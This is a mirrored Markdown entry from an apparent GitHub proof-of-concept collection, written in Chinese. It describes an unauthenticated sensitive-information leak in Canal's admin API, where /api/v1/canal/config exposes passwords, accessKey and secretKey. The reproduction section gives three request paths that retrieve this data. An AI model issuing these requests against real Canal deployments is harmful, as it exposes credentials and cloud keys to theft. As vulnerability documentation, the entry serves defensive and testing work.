mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
27 lines
754 B
Markdown
27 lines
754 B
Markdown
|
|
# Canal存在敏感信息泄露漏洞
|
|||
|
|
|
|||
|
|
### 一、漏洞描述
|
|||
|
|
由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露
|
|||
|
|
|
|||
|
|
### 二、影响版本
|
|||
|
|

|
|||
|
|
|
|||
|
|
### 三、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
/api/v1/canal/config/1/0
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
/api/v1/canal/config/0/9
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
/api/v1/canal/instance/1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-09-05 23:24:41
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ulgmpe74leezg156>
|